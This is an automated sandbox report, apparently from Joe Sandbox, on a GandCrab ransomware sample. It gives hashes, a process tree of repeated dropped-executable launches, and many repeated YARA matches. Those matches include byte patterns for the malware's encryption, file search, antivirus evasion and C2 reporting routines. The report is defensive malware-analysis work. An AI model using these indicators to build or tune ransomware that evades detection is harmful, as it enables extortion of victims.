Edit tour

Windows Analysis Report
mPNVrHIpyt.exe

Overview

General Information

Sample Name:	mPNVrHIpyt.exe
Analysis ID:	694572
MD5:	cc7ae6e4c86f605aab66fbd04eef7997
SHA1:	8c7c23c91ccecf548c6f9df30b839b9b24d57095
SHA256:	95427e787bb623ba2d2ec51cb289ae579aea27a674d900f9aa239f6a034b05cc
Tags:	exeGandCrab
Infos:

Detection

Gandcrab, ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gandcrab

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected ReflectiveLoader

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Creates multiple autostart registry keys

Contains functionality to determine the online IP of the system

Found Tor onion address

Machine Learning detection for sample

May check the online IP address of the machine

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Contains functionality to enumerate device drivers

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

mPNVrHIpyt.exe (PID: 3592 cmdline: "C:\Users\user\Desktop\mPNVrHIpyt.exe" MD5: CC7AE6E4C86F605AAB66FBD04EEF7997)

wzltxa.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 1920 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 4616 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 1356 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 6016 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 5520 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 2228 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 2156 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 5248 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 4920 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 1200 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

wzltxa.exe (PID: 5280 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe" MD5: EAC223A7EC1CF2E33BE569DB14A87A63)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mPNVrHIpyt.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
mPNVrHIpyt.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
mPNVrHIpyt.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
mPNVrHIpyt.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
mPNVrHIpyt.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
mPNVrHIpyt.exe	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001F.00000000.523518226.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000B.00000000.302743243.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000022.00000000.561698093.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000027.00000002.606192732.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000014.00000000.401188568.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001C.00000000.485070318.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000000.363985954.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000F.00000002.385026266.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000002.471324197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000000.00000000.264971762.000000000F69A000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000D.00000002.357323149.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000014.00000002.405226267.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000022.00000002.565428063.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001B.00000000.467592821.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000028.00000000.597821532.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
